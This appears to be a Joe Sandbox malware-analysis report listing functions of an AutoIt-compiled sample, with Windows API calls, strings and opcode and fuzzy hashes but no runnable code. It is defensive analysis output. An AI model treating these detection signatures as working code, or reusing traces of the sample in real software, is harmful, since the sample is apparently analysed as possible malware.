                                                                                                                            • API String ID: 3850602802-2096851135
                                                                                                                            • Opcode ID: 9cc8ee62db39694dc322008f4ab03cdfe9af8cd72a00bc7c842cc93c74c12d99
                                                                                                                            • Instruction ID: 706ad81bc43b33edaa597fd2b88883f294cfaff4190bf9527733c618e3d214d8
                                                                                                                            • Opcode Fuzzy Hash: 9cc8ee62db39694dc322008f4ab03cdfe9af8cd72a00bc7c842cc93c74c12d99
                                                                                                                            • Instruction Fuzzy Hash: 8C11B271600208AFEF118F54DC80EAB3B6AEB48368F110129F914D7290DA75DC51A7A0
                                                                                                                            Function 00F66C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EE1D73
                                                                                                                              • Part of subcall function 00EE1D35: GetStockObject.GDI32(00000011), ref: 00EE1D87
                                                                                                                              • Part of subcall function 00EE1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EE1D91
                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00F66C71
                                                                                                                            • GetSysColor.USER32(00000012), ref: 00F66C8B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                            • String ID: static
                                                                                                                            • API String ID: 1983116058-2160076837
                                                                                                                            • Opcode ID: 5b1bbf4d2702daf4093e94f4b3185fcbf9fa8a8821b75db9748d25272584ac48
                                                                                                                            • Instruction ID: 496da1589eabde141cdcd7d72aeb592699382d07bfa95885e8fd8304b524b7fb
                                                                                                                            • Opcode Fuzzy Hash: 5b1bbf4d2702daf4093e94f4b3185fcbf9fa8a8821b75db9748d25272584ac48
                                                                                                                            • Instruction Fuzzy Hash: 64212972910209AFDF04DFA8DC45AEA7BA8FB08315F044629F995E3250D675E850EB60
                                                                                                                            Function 00F66920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 00F669A2
                                                                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F669B1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LengthMessageSendTextWindow
                                                                                                                            • String ID: edit
                                                                                                                            • API String ID: 2978978980-2167791130
                                                                                                                            • Opcode ID: 3897a4b772134fcc88d9e893a488b40e8cc23581c8e8aefedd7596ab094b0734
                                                                                                                            • Instruction ID: a4cf01f9d55789c3e86ff3a1c0a2ff5f3712a89f0be8977fc41ea6d68cecedef
                                                                                                                            • Opcode Fuzzy Hash: 3897a4b772134fcc88d9e893a488b40e8cc23581c8e8aefedd7596ab094b0734
                                                                                                                            • Instruction Fuzzy Hash: 59116A71910208ABEB108E64DC40AEB3AA9EB053B8F504724F9A5E71E0CA75DC94BB60
                                                                                                                            Function 00F429AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00F42A22
                                                                                                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00F42A41
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoItemMenu_memset
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 2223754486-4108050209
                                                                                                                            • Opcode ID: 551f5da91741a017b8e56639937b01d013c4b3db6e64c548d8d2ebde840dc5fc
                                                                                                                            • Instruction ID: 395cafc72595eb807bbc63412dbb0c3dfd7e551d3ecb20a6e6a868dc4d9ec2f9
                                                                                                                            • Opcode Fuzzy Hash: 551f5da91741a017b8e56639937b01d013c4b3db6e64c548d8d2ebde840dc5fc
                                                                                                                            • Instruction Fuzzy Hash: 4411D372D01118ABEB70DF98DC44B9ABBB8AB46324F844031FC55E7290D778AD4AF791
                                                                                                                            Function 00F521D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F5222C
                                                                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F52255
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$OpenOption
                                                                                                                            • String ID: <local>
                                                                                                                            • API String ID: 942729171-4266983199
                                                                                                                            • Opcode ID: 72daf4e229d5f1a86817faf16e614c5a3b6a2bf8d004764ba0176c41c373faf6
                                                                                                                            • Instruction ID: 8206de58bbaf2ff5d8cb0c46bfdaa79859827fcb8c18bff5a308e7fd8f150207
                                                                                                                            • Opcode Fuzzy Hash: 72daf4e229d5f1a86817faf16e614c5a3b6a2bf8d004764ba0176c41c373faf6
                                                                                                                            • Instruction Fuzzy Hash: 7511C174901225BAEB248F118C84EB7BBA8FB17362F10832AFA1486000D3705949E6F0
                                                                                                                            Function 00F38E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
                                                                                                                              • Part of subcall function 00F3AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F3AABC
                                                                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F38E73
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassMessageNameSend_memmove
                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                            • API String ID: 372448540-1403004172
                                                                                                                            • Opcode ID: 4a4431a138259b4840f9fde0aadc8acd328e5d689bf05e69bc20bfa91c33ed98
                                                                                                                            • Instruction ID: 249123b1d106de3425cb273e4c4e0765daef05efcd0037beb0ad54c815302b2e
                                                                                                                            • Opcode Fuzzy Hash: 4a4431a138259b4840f9fde0aadc8acd328e5d689bf05e69bc20bfa91c33ed98
                                                                                                                            • Instruction Fuzzy Hash: D701DE72A0531CAB9F14ABE1CC419FE73A8EF02370F100A19B871672E2DE395809E661
                                                                                                                            Function 00F6DDE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: 3c$_
                                                                                                                            • API String ID: 4104443479-4099079164
                                                                                                                            • Opcode ID: 105aa1174520fd8bf29f6690e89b4cfabb317d667cefa397a02f4792fe11b7f1
                                                                                                                            • Instruction ID: fe93f478f914a557d0a2007f646197cf3ae18742ff3972557eda699fbe3a5ba0
                                                                                                                            • Opcode Fuzzy Hash: 105aa1174520fd8bf29f6690e89b4cfabb317d667cefa397a02f4792fe11b7f1
                                                                                                                            • Instruction Fuzzy Hash: 4A018072B00B059FD730CE6CDD94A6AB7E9BB647557104D2EE142CBA51EB72F804AB10
                                                                                                                            Function 00F38CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
                                                                                                                              • Part of subcall function 00F3AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F3AABC
                                                                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00F38D6B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassMessageNameSend_memmove
                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                            • API String ID: 372448540-1403004172
                                                                                                                            • Opcode ID: 9650b08495b81867b3513eb4ab7dd2d6e82c61db840665908d0af3cf4d999d5e
                                                                                                                            • Instruction ID: d9e10aa4402329fa97636a7079572406dc17ba22895f946cdf7d361548cd1941
                                                                                                                            • Opcode Fuzzy Hash: 9650b08495b81867b3513eb4ab7dd2d6e82c61db840665908d0af3cf4d999d5e
                                                                                                                            • Instruction Fuzzy Hash: E501D472A4520CABDF15EBE1CD52AFE73A8DF153A0F100019B855732E2DE295E08E272
                                                                                                                            Function 00F38D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
                                                                                                                              • Part of subcall function 00F3AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F3AABC
                                                                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00F38DEE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassMessageNameSend_memmove
                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                            • API String ID: 372448540-1403004172
                                                                                                                            • Opcode ID: afc1d2cdcea4192efccacf93e063685ce8181d4fffa70f9206284299cbae7888
                                                                                                                            • Instruction ID: 99dd62b83e9f5db6f40a6b4a9d0f44e0a1ec83ea974574ff9adc7a97f16ccb66
                                                                                                                            • Opcode Fuzzy Hash: afc1d2cdcea4192efccacf93e063685ce8181d4fffa70f9206284299cbae7888
                                                                                                                            • Instruction Fuzzy Hash: C301A772A4530DA7DF11E6A5CD42AFE77A8DF11360F100015B855B3292DE295E09F272
                                                                                                                            Function 00F44F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassName_wcscmp
                                                                                                                            • String ID: #32770
                                                                                                                            • API String ID: 2292705959-463685578
                                                                                                                            • Opcode ID: ff740367b65dae14a01e549eab7d104a276ec906031fb49fbf62e79ee9a123aa
                                                                                                                            • Instruction ID: 2dfc5f6e9eb9e103f047f36d6da7129cd95ff83a45ccd9e6701e1bf81706aa56
                                                                                                                            • Opcode Fuzzy Hash: ff740367b65dae14a01e549eab7d104a276ec906031fb49fbf62e79ee9a123aa
                                                                                                                            • Instruction Fuzzy Hash: 7EE0D13290422D2BD7109755AC45FA7F7ACDB45B70F050057FD04D3151D5609A4997D1
                                                                                                                            Function 00F1B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F1B314: _memset.LIBCMT ref: 00F1B321
                                                                                                                              • Part of subcall function 00F00940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00F1B2F0,?,?,?,00EE100A), ref: 00F00945
                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,00EE100A), ref: 00F1B2F4
                                                                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00EE100A), ref: 00F1B303
                                                                                                                            Strings
                                                                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F1B2FE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                            • API String ID: 3158253471-631824599
                                                                                                                            • Opcode ID: a45c90b99aa6cee02e017f00383c6fb004a06c79971fee471307537987ab2c73
                                                                                                                            • Instruction ID: 5c82eb1d0605543594cba41af98b5242326763cf4c68febccb39c259453375f8
                                                                                                                            • Opcode Fuzzy Hash: a45c90b99aa6cee02e017f00383c6fb004a06c79971fee471307537987ab2c73
                                                                                                                            • Instruction Fuzzy Hash: A0E06D70200744CBD760AF28E8047827AE4EF04714F00892CE466C7741EBB4E488EBA1
                                                                                                                            Function 00F37C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F37C82
                                                                                                                              • Part of subcall function 00F03358: _doexit.LIBCMT ref: 00F03362
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message_doexit
                                                                                                                            • String ID: AutoIt$Error allocating memory.
                                                                                                                            • API String ID: 1993061046-4017498283
                                                                                                                            • Opcode ID: 91d4b70e7ae70a573cc4b9fba1ff03cafab173c9fd636f6d4130feb6102d16a5
                                                                                                                            • Instruction ID: 8d6882a206e4bb50b60cf3f2e7e18377c11affeeb99e11a845a78c7fa47c67e0
                                                                                                                            • Opcode Fuzzy Hash: 91d4b70e7ae70a573cc4b9fba1ff03cafab173c9fd636f6d4130feb6102d16a5
                                                                                                                            • Instruction Fuzzy Hash: 74D05B723C835C36D21532E9BC07FCA76884F05B62F144426FB08695D34DD6859071E7
                                                                                                                            Function 00F21935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetSystemDirectoryW.KERNEL32(?), ref: 00F21775
                                                                                                                              • Part of subcall function 00F5BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00F2195E,?), ref: 00F5BFFE
                                                                                                                              • Part of subcall function 00F5BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00F5C010
                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00F2196D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                                                            • String ID: WIN_XPe
                                                                                                                            • API String ID: 582185067-3257408948
                                                                                                                            • Opcode ID: 390d02ac167f4437df2a2031b1acf99429af13afb5839a7c04f55635ea719f30
                                                                                                                            • Instruction ID: 5266355bc8a0dcadc80bfa6dd2f077373071ea2de8b190bdeb2dc039e75a640b
                                                                                                                            • Opcode Fuzzy Hash: 390d02ac167f4437df2a2031b1acf99429af13afb5839a7c04f55635ea719f30
                                                                                                                            • Instruction Fuzzy Hash: 69F0397180001DDFCB25DBA1E984BECBBF8BB58305F240095E512A2090C7714F8AEF65
                                                                                                                            Function 00F65998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F659AE
                                                                                                                            • PostMessageW.USER32(00000000), ref: 00F659B5
                                                                                                                              • Part of subcall function 00F45244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F452BC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                            • Opcode ID: 9bd14183de42d7f658ee8f44bb558a8b2161f086e6c5fadd6baa7757f28904cc
                                                                                                                            • Instruction ID: 1dd5792886e3ca726f1ba7cc7705a81331e04d5f97f2e2d4436a094a90baba02
                                                                                                                            • Opcode Fuzzy Hash: 9bd14183de42d7f658ee8f44bb558a8b2161f086e6c5fadd6baa7757f28904cc
                                                                                                                            • Instruction Fuzzy Hash: AFD0C9313807157BE664BB70AC0BF967A14AB06B50F051826B656AA1D1C9E4AC04D654
                                                                                                                            Function 00F65964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F6596E
                                                                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F65981
                                                                                                                              • Part of subcall function 00F45244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F452BC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                            • Opcode ID: 90470e667aa57c5a0cf85b5f059277d83d1f4e56fafcbd9beedd88ae3e48bc84
                                                                                                                            • Instruction ID: c1eba083146c5495e33aa9764e380700fb7a2e43897f33932b41884c226e5930
                                                                                                                            • Opcode Fuzzy Hash: 90470e667aa57c5a0cf85b5f059277d83d1f4e56fafcbd9beedd88ae3e48bc84
                                                                                                                            • Instruction Fuzzy Hash: 54D0C931384715B7E664BB70AC0BF967A14AB01B50F051826B65AAA1D1C9E49C04D654